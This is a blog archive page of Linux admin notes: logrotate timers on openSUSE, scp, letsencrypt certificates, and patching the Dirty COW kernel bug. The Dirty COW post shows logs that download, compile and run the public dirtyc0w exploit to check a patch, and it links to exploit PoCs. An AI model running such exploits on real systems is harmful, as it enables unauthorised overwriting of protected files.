The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests

  • My badges

    Mastodon

  • Twitter Updates

  • My Flickr Stream

    20140508-Delphi-2007--Project-Options--Cannot-Edit-Application-Title-HelpFile-Icon-Theming20140430-Fiddler-Filter-Actions-Button-Run-Filterset-now20140424-VMware-Fusion-6.0.3.-no-reclaimable
    More Photos

  • Pages

  • All categories

  • Enter your email address to subscribe to this blog and receive notifications of new posts by email.

    Join 1,862 other subscribers

Archive for the ‘*nix’ Category

« Previous Entries
Next Entries »

Kerlink IoT station page | LoRa | Semtech

Posted by jpluimers on 2016/11/07

This can be used for TheThingsNetwork.org.

Some downloads:

Attachments
File Last modified Size
Kerlink_gateway_channel_setup_v0.2.pdf 2015-05-18 17:20 838Kb
Kerlink_gateway_installation_R7.pdf 2015-08-13 14:32 805Kb
Python_gateway_spectrum_display.zip 2015-04-09 15:54 10Kb
kerlink_IoT_LoRa_update.zip 2015-08-13 14:27 63Kb
kerlink_IoT_LoRa_update_DHCP.zip 2015-08-13 14:27 64Kb

Source: Kerlink IoT station page | LoRa | Semtech

Posted in *nix, IoT Internet of Things, LoRa - Long Range wireless communications network, Network-and-equipment, Power User, Uncategorized | Leave a Comment »

What runs logrotate in OpenSUSE 13.2?

Posted by jpluimers on 2016/11/04

Historically, on many systems, logrotate is being ran from a daily cron job. Many tutorials still presume that, for instance HowTo: The Ultimate Logrotate Command Tutorial with 10 Examples.

I still thought it would and after writing On OpenSuSE, when adding Apache vhosts with their own log files don’t forget to update your logrotate configuration I was anxious to see when logrotate would run the second time.

So I tried finding it in the cron.daily and it wasn’t there.

OpenSuSE 13.2 changed how logrotate is inficated: from there on (including both Tumbleweed and LEAP) logrotate is ran from the systemd service:

logrotate is a systemd service in 13.2 (/usr/lib/systemd/system/logrotate.service) and it is run periodically by a systemd timer (not cron).

Have a look at /usr/lib/systemd/system/logrotate.timer and “man systemd.timer”.

You can view the status of the logrotate.timer that fires it every day:

systemctl status logrotate.timer

It triggers logrotate and reads the config in /etc/logrotate.conf for basic global settings and then files in /etc/logrotate.d/* for custom settings for specific files.

Which means you should not mess around with files in /etc/logrotate.d/ as each file there will be processed. So don’t leave around backup files ending in a tilde (~) or DEADJOE as it causes trouble:

Jul 07 00:00:02 revue logrotate[16121]: error: DEADJOE:5 lines must begin with a keyword or a filename (possibly in double quotes)
Jul 07 00:00:02 revue logrotate[16121]: error: DEADJOE:6 missing '{' after log files definition
Jul 07 00:00:02 revue logrotate[16121]: error: found error in file DEADJOE, skipping

There’s more you can do do debug logrotate behaviour

The below tips are all based on this thread: [Bug 913421] logrotate not running after update from 13.1 to 13.2

Show if the timer is there and counting:

# systemctl list-timers --all
NEXT                          LEFT          LAST                          PASSED    UNIT                         ACTIVATES
Fri 2016-07-08 00:00:00 CEST  5h 24min left Thu 2016-07-07 00:00:02 CEST  18h ago   logrotate.timer              logrotate.service
Fri 2016-07-08 17:51:53 CEST  23h left      Thu 2016-07-07 17:51:53 CEST  43min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

2 timers listed.

Show the status of the logrotate service itself:

# systemctl status logrotate.service --full
● logrotate.service - Rotate log files
   Loaded: loaded (/usr/lib/systemd/system/logrotate.service; static; vendor preset: disabled)
   Active: failed (Result: exit-code) since Thu 2016-07-07 00:00:02 CEST; 18h ago
     Docs: man:logrotate(8)
           man:logrotate.conf(5)
  Process: 16121 ExecStart=/usr/sbin/logrotate /etc/logrotate.conf (code=exited, status=1/FAILURE)
 Main PID: 16121 (code=exited, status=1/FAILURE)

Jul 07 00:00:02 revue logrotate[16121]: error: DEADJOE:5 lines must begin with a keyword or a filename (possibly in double quotes)
Jul 07 00:00:02 revue logrotate[16121]: error: DEADJOE:6 missing '{' after log files definition
Jul 07 00:00:02 revue logrotate[16121]: error: found error in file DEADJOE, skipping
Jul 07 00:00:02 revue logrotate[16121]: error: skipping "/var/log/squidGuard/squidGuard.log" because parent directory has insecure permissions (It's world writable or writable by group which is not "root") Set "su" directive in config file to tell logrotate which user/group should be used for rotation.
Jul 07 00:00:02 revue logrotate[16121]: compress_ext is /usr/bin/xz
Jul 07 00:00:02 revue logrotate[16121]: compress_ext was changed to .xz
Jul 07 00:00:02 revue systemd[1]: logrotate.service: Main process exited, code=exited, status=1/FAILURE
Jul 07 00:00:02 revue systemd[1]: Failed to start Rotate log files.
Jul 07 00:00:02 revue systemd[1]: logrotate.service: Unit entered failed state.
Jul 07 00:00:02 revue systemd[1]: logrotate.service: Failed with result 'exit-code'.

The bottom lines are from journalctl -u logrotate which can show more information.

In this case, fixing both issues was easy: remove DEADJOE and correct the permissions on this empty directory:

# ls -al /var/log/squidGuard/
total 0
drwxrwx--- 1 squid squid   0 Jun 16 21:08 .
drwxr-xr-x 1 root  root  962 Jul  6 17:36 ..
# chmod 750 /var/log/squidGuard/
# ls -al /var/log/squidGuard/
total 0
drwxr-x--- 1 squid squid   0 Jun 16 21:08 .
drwxr-xr-x 1 root  root  962 Jul  6 17:36 ..

If you can’t wait for the timer to fire at midnight, you can invoke the logrotate service manually (after that wait until it is finished then do something like du -csh /var/log/* or list the files):

# systemctl start logrotate.service

–jeroen

via:

Posted in *nix, Linux, logrotate, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

OpenSuSE fix “piix4_smbus 0000:00:07.3: SMBus Host Controller not enabled!”

Posted by jpluimers on 2016/11/01

If you see this in journalctl after boot in a VM, then you likely want to disable piix4 smbus device detection:

Jul 07 23:02:47 revue systemd-udevd[507]: maximum number (136) of children reached
Jul 07 23:02:47 revue systemd-udevd[507]: maximum number (136) of children reached
...
Jul 07 23:02:47 revue systemd-udevd[507]: maximum number (136) of children reached
Jul 07 23:02:47 revue systemd-udevd[507]: maximum number (136) of children reached
...
Jul 07 23:02:47 revue kernel: piix4_smbus 0000:00:07.3: SMBus Host Controller not enabled!

The solution is to add one line to /etc/modprobe.d/50-blacklist.conf  (well: maybe [WayBack] add a comment line as well):

blacklist i2c_piix4

via:

–jeroen

 

Posted in *nix, *nix-tools, bash, bash, Development, Linux, openSuSE, Power User, Scripting, Software Development, SuSE Linux, Tumbleweed | 2 Comments »

Reminder to self: nosudoers changed in Raspbian…

Posted by jpluimers on 2016/10/31

So I won’t forget: trying to make sense of this incomprehensible message (and the update on a Raspberry Pi takes looooooooong and while updating, the file /etc/sudoers.d/010_pi-nopasswd does not exist yet)

20161018+1 reintroduces passwordless sudo for pi user even if previously removed · Issue #6 · RPi-Distro/raspberrypi-sys-mods [WayBack]

raspberrypi-sys-mods (20161018+3) jessie; urgency=medium

  * The 20161018 release has introduced a /etc/sudoers.d/010_pi-nopasswd file.
    - The file is installed even if the "pi ALL=(ALL) NOPASSWD: ALL" entry has been
      previously removed from /etc/sudoers by the user.
    - If you do not want the entry to exist, please comment out or remove 010_pi-nopasswd.
    - If upgrading to 20161018+3 from a version earlier than 20161018, the line in
      010_pi-nopasswd is automatically commented out if the entry doesn't exist in sudoers.
    - See https://github.com/RPi-Distro/raspberrypi-sys-mods/issues/6

 -- Serge Schneider   Wed, 19 Oct 2016 10:52:07 +0100

And after like an hour of waiting:

[master b78090b] committing changes in /etc after apt run
 6 files changed, 52 insertions(+), 29 deletions(-)
 rewrite apt/apt.conf.d/01autoremove-kernels (88%)
 create mode 100644 sudoers.d/010_pi-nopasswd

–jeroen

Posted in *nix, Debian, Linux, Power User, Raspbian | 2 Comments »

On OpenSuSE, when adding Apache vhosts with their own log files don’t forget to update your logrotate configuration

Posted by jpluimers on 2016/10/27

Sometimes you forget one crucial step…

When adding Apache vhosts on OpenSuSE and each vhost has it’s own set of log-files, then they will not be logrotated by default.

So you have to edit the configuration.

I’ve done it by copying the default apache2 logrotate configuration file for each vhost like this:

/etc/logrotate.d # cp apache2 apache2.vhost.##hostname##

Here ##hostname## is the name of the vhost.

Then I edited each file and replaced the generic log file names with the specific ones for each vhost.

There are only a few vhosts on my system so the manual job wasn’t so bad, but with a great number of vhosts you’d probably want to make this a template process beyond this:

function logrotate-add-apache2-vhost-file()
{
  # $1 is the vhost name
  ## http://stackoverflow.com/questions/16790793/how-to-replace-strings-containing-slashes-with-sed/16790877#16790877
  cat /etc/logrotate.d/apache2 | sed -r "s#/var/log/apache2/#/var/log/apache2/$1-#g" > /etc/logrotate.d/apache2.vhost.$1 
  git add /etc/logrotate.d/apache2.vhost.$1
}

This will then show in less what logrotate (which will output both to stderr and stdout, hence the 2>&1 redirect) would do on the next invocation:

logrotate -d /etc/logrotate.conf 2>&1 | less

And this is a very nice logrotate alias as well:

alias logrotate-show-status='echo "# systemctl list-timers --all" && systemctl list-timers --all && echo "# systemctl status logrotate.timer --full" && systemctl status logrotate.timer --full && echo "# journalctl -u logrotate" && journal

–jeroen

Posted in *nix, *nix-tools, Apache2, Development, Linux, logrotate, openSuSE, Power User, Scripting, Software Development, SuSE Linux, Tumbleweed | 1 Comment »

OpenSuSE Tumbleweed: after installing from ISO, be sure to disable/remove the ISO repo

Posted by jpluimers on 2016/10/26

TL;DR: OpenSuSE Tumbleweed – after installing from ISO, be sure to disable/remove the ISO repo.

A while ago I had a weird thing on my OpenSuSE Tumbleweed system while upgrading (yes, zypper dist-upgrade is the recommended way to update Tumbleweed): it would complain in this way zypper dup indicates python3-urllib3-1.16-1.1.noarch requires python(abi) = 3.5:

# zypper dup
Warning: You are about to do a distribution upgrade with all enabled repositories. Make sure these repositories are compatible before you continue. See 'man zypper' for more information about this command.
Loading repository data...
Reading installed packages...
Computing distribution upgrade...

Problem: python3-urllib3-1.16-1.1.noarch requires python(abi) = 3.5, but this requirement cannot be provided
 Solution 1: Following actions will be done:
  deinstallation of python3-urllib3-1.15.1-2.1.noarch
  deinstallation of python3-wheel-0.29.0-2.1.noarch
  deinstallation of speedtest-cli-0.3.2-4.3.noarch
  deinstallation of python3-six-1.10.0-4.1.noarch
  deinstallation of python3-pycparser-2.14-2.1.noarch
  deinstallation of python3-pyasn1-0.1.9-2.1.noarch
  deinstallation of python3-pyOpenSSL-16.0.0-3.1.noarch
  deinstallation of python3-idna-2.1-1.1.noarch
  deinstallation of python3-chardet-2.3.0-1.4.noarch
 Solution 2: keep obsolete python-cupshelpers-1.5.7-7.2.noarch
 Solution 3: break python3-urllib3-1.16-1.1.noarch by ignoring some of its dependencies

Choose from above solutions by number or cancel [1/2/3/c] (c):

What eventually – with help from the excellent help by DimStar on the #openSUSE-factory IRC channel – led to the solution was the part Solution 2: keep obsolete python-cupshelpers-1.5.7-7.2.noarch.

But first let’s look at the installed versions and repos:

Read the rest of this entry »

Posted in *nix, Development, Internet, Linux, openSuSE, Power User, Scripting, Software Development, SpeedTest, SuSE Linux, Tumbleweed | Leave a Comment »

How to copy files from one machine to another using ssh – Unix & Linux Stack Exchange

Posted by jpluimers on 2016/10/25

I’m using Linux (centos) machine, I already connected to the other system using ssh. Now my question is how can I copy files from one system to another system?

Source: How to copy files from one machine to another using ssh – Unix & Linux Stack Exchange

Nice question, uh? In my opinion the best answer is “Use scp to avoid going through hoops with complex configurations to re-use your existing ssh connection” like this:

To copy a file from B to A while logged into B:

    scp /path/to/file username@A:/path/to/destination

To copy a file from B to A while logged into A:

    scp username@B:/path/to/file /path/to/destination

Source: DopeGhoti answering How to copy files from one machine to another using ssh – Unix & Linux Stack Exchange

Instead the question is marked duplicate of SSH easily copy file to local system – Unix & Linux Stack Exchange where (contrary to the ‘easily’ part of the question) go through hoops and loops with all kinds of fancy ssh settings and port forwards.

Recursive

For recursive, use the -r option, as per [WayBack] shell – How to copy a folder from remote to local using scp? – Stack Overflow:

scp -r user@your.server.example.com:/path/to/foo /home/user/Desktop/

From man scp (See online manual)

-r Recursively copy entire directories

Related:

Read the rest of this entry »

Posted in *nix, *nix-tools, bash, Communications Development, Development, Internet protocol suite, Power User, Scripting, Software Development, SSH, TCP | Leave a Comment »

How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]

Posted by jpluimers on 2016/10/21

There is a nasty (Dirty COW: CVE-2016-5195) Linux kernel bug with zero-day exploits floating around

OpenSuSE updates will be available soon (likely this weekend); from the  #openSUSE-factory IRC channel :

wiert: any E.T.A. for CVE-2016-5195 in the various releases?

_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow

wiert: How about Tumbleweed?

DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday

via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]

Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.

Edit: 13.2 didn’t make it on monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752

More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

–jeroen

Testing 13.2:

# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
# zypper patch

This works fine in await of the formal update process and me testing it resulted in the release of the kernel to the official 13.2 update, but note you still have to reboot after the update even though the process doesn’t tell you that:

wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e
wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now.
_Marcus_: wiert: thanks :)
wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”.
_Marcus_: after your feedback i have now released the kenel ;)
wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot!
wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but I after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt


# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done]
Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added
Enabled : Yes
Autorefresh : No
GPG Check : Yes
URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/
# zypper patch
New repository or package signing key received:
Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update)
Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org>
Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48
Key Created: Thu Aug 6 11:49:53 2015
Key Expires: Sat Oct 14 11:49:53 2017
Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t
Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done]
Loading repository data…
Reading installed packages…
Resolving package dependencies…
The following NEW package is going to be installed:
kernel-default-3.16.7-45.1
The following NEW patch is going to be installed:
5752
1 new package to install.
Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used.
Continue? [y/n/? shows all options] (y): y
Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked)
Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)]
Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done]
(1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done]
Additional rpm output:
warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible.
# reboot

view raw

installing-patch.txt

hosted with ❤ by GitHub


(1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done]
Additional rpm output:
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
(2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done]
(3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done]

view raw

tail-log-of-official-update.txt

hosted with ❤ by GitHub


$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap ffffffffffffffff
madvise -100000000
procselfmem -100000000
$ cat foo
cat: foo: No such file or directory
$ sudo su –
# cat foo
this is not a test
# logout

view raw

testing-after-reboot.txt

hosted with ❤ by GitHub


$ cd /tmp/
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f6ab7207000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
$ sudo su –
# reboot
login
$ cd /tmp/
$ sudo su –
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f5465983000
madvise 0
procselfmem 1800000000
$ cat foo
this is not a test

view raw

testing-official-update-before-reboot-then-reboot-retest.txt

hosted with ❤ by GitHub

Posted in *nix, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

Merging multiple commands and piping it to one output.

Posted by jpluimers on 2016/10/20

The unix shell is hard, but boy, sometimes it can work like magic, for instance piping two testssl.sh commands into one gist:

retinambpro1tb:testssl.sh jeroenp$ ( ./testssl.sh --version ; ./testssl.sh --local ) | gist -d "testsll version and local ciphers for Mac OS X Darwin binarries supporting zlib"
https://gist.github.com/701496d7fbf929967aa1

The source of this magic was this AskUbuntu answer: How to merge and pipe results from two different commands to single command? – Ask Ubuntu

–jeroen

via: openssl.Darwin.x86_64 lacks zlib support · Issue #164 · drwetter/testssl.sh

Posted in *nix, *nix-tools, bash, bash, Development, Power User, Scripting, Software Development, Uncategorized | Leave a Comment »

letsenctrypt certbot-auto – finding what certificates are there and which apache configurations use them

Posted by jpluimers on 2016/10/13

IRC #letsencrypt-dev today:

wiert

Is there any way for `certbot-auto` to show for which domains/apache-configs it has certificates?

pdeee

wiert, we actually made a ticket for 0.10.0 to do that

https://github.com/certbot/certbot/issues/3615

in the mean time, your imperfect options are:

for file in /etc/letsencrypt/live/*/fullchain.pem ; do echo -n $file ;  openssl x509 -text -noout -in $file | grep DNS; done

for installation in Apache configs, you can follow that with:

grep /etc/letsencrypt/live /etc/apache2/sites-enabled/*

wiert

@pdeee on OpenSuSE, the last statement should be

grep -r /etc/letsencrypt/live /etc/apache2/*

–jeroen

Posted in *nix, Encryption, Let's Encrypt (letsencrypt/certbot), Linux, openSuSE, Power User, Security, SuSE Linux | Leave a Comment »

« Previous Entries
Next Entries »